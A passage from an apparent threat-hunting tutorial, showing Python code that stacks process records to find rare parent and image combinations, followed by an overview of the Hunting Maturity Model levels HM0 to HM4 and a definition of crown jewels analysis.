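RECORDS = [_rec(h, SVCHOST, SERVICES) for h in ("ws01", "ws02", "ws03", "ws04")]
RECORDS += [_rec(h, EXPLORER, USERINIT) for h in ("ws01", "ws02", "ws03", "ws04")]
RECORDS.append(_rec("ws02", SVCHOST, CMD))        # real binary, abnormal parent
RECORDS.append(_rec("ws03", LOOKALIKE, CMD))      # masquerading binary in a user-writable path


def stack(records, *fields):
    """Count each distinct combination of `fields`; rarest combinations come first."""
    counts = Counter(tuple(r[f] for f in fields) for r in records)
    return sorted(counts.items(), key=lambda kv: (kv[1], kv[0]))


def outliers(records, *fields, max_count=1):
    """Combinations seen at most `max_count` times: the short end of the stack to review first."""
    return [key for key, n in stack(records, *fields) if n <= max_count]


def hosts_with(records, **match):
    """Which hosts produced a record matching every given field (pivot from a rare value back to hosts)."""
    return sorted({r["host"] for r in records if all(r[k] == v for k, v in match.items())})
```

Run stack() first on one column to get a feel for the distribution, then on pairs such as (image, parent), (image, signer) or (service name, binary path) as the hypothesis demands; the long end of the stack is the baseline and the short end is the review queue, and hosts_with() is the pivot back to the machines that need a closer look.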

Datasets

Which techniques you use is part of your strategy and comes with experience. But without sufficient data, and without the right data, you cannot hunt at all. What counts as the right data depends on what you are aiming for, but the following is a broad list of datasets that are well suited for hunting and security:

Hunting Maturity Model (HMM)

The Hunting Maturity Model was developed by Sqrrl’s security architect David J. Bianco. It measures an organisation’s current hunting maturity based on the data it collects, its creation of data analysis procedures, its incident response and its hunting automation.

There are five levels in the Hunting Maturity Model (HMM):

Increasing maturity reflects how well an organisation can collect data and establish data analysis procedures (DAP) on top of it, and how far it automates hunting. Analysts and managers use the HMM to assess current maturity and to build a roadmap.

HM0 – Initial: An organisation at HM0 relies on automated alerting tools such as IDS, SIEM or antivirus to identify malicious activity. It may consume signature update feeds or threat indicator feeds, or even build its own signatures and indicators, but these are fed directly into the monitoring system.

HM1 – Minimal: An organisation at HM1 still relies mainly on automated alerting, but at least some routine IT data collection is carried out. It also uses threat intelligence to drive detection.

HM2 – Procedural: At level 2 maturity, an organisation follows analysis procedures created by others. It has a high or very high level of routine data collection. It may regularly apply and adapt procedures developed by others and can make minor improvements, but it is not yet able to establish entirely new procedures itself.

HM3 – Innovative: HM3 organisations have at least a few hunters who understand different data analysis techniques and can apply them to detect malicious activity. Such organisations typically establish and publish procedures rather than depending on procedures established by others (as in the HM2 case).

HM4 – Leading: HM4 is the same as HM3 with one significant difference: automation. Every effective hunting process at HM4 is turned into automated detection. This frees analysts from repeatedly running the same processes and lets them focus on improving existing processes or developing new ones.

Keywords: Crown jewels analysis: Crown Jewels Analysis (CJA) is a process for identifying those cyber assets that are most critical to the accomplishment of an organization’s mission.

Reference:

https://www.threathunting.net/files/hunt-evil-practical-guide-threat-hunting.pdf

https://www.threathunting.net/files/huntpedia.pdf

Author: Nisha Sharma is trained in Certified Ethical hacking and Bug Bounty Hunter. Connect with her here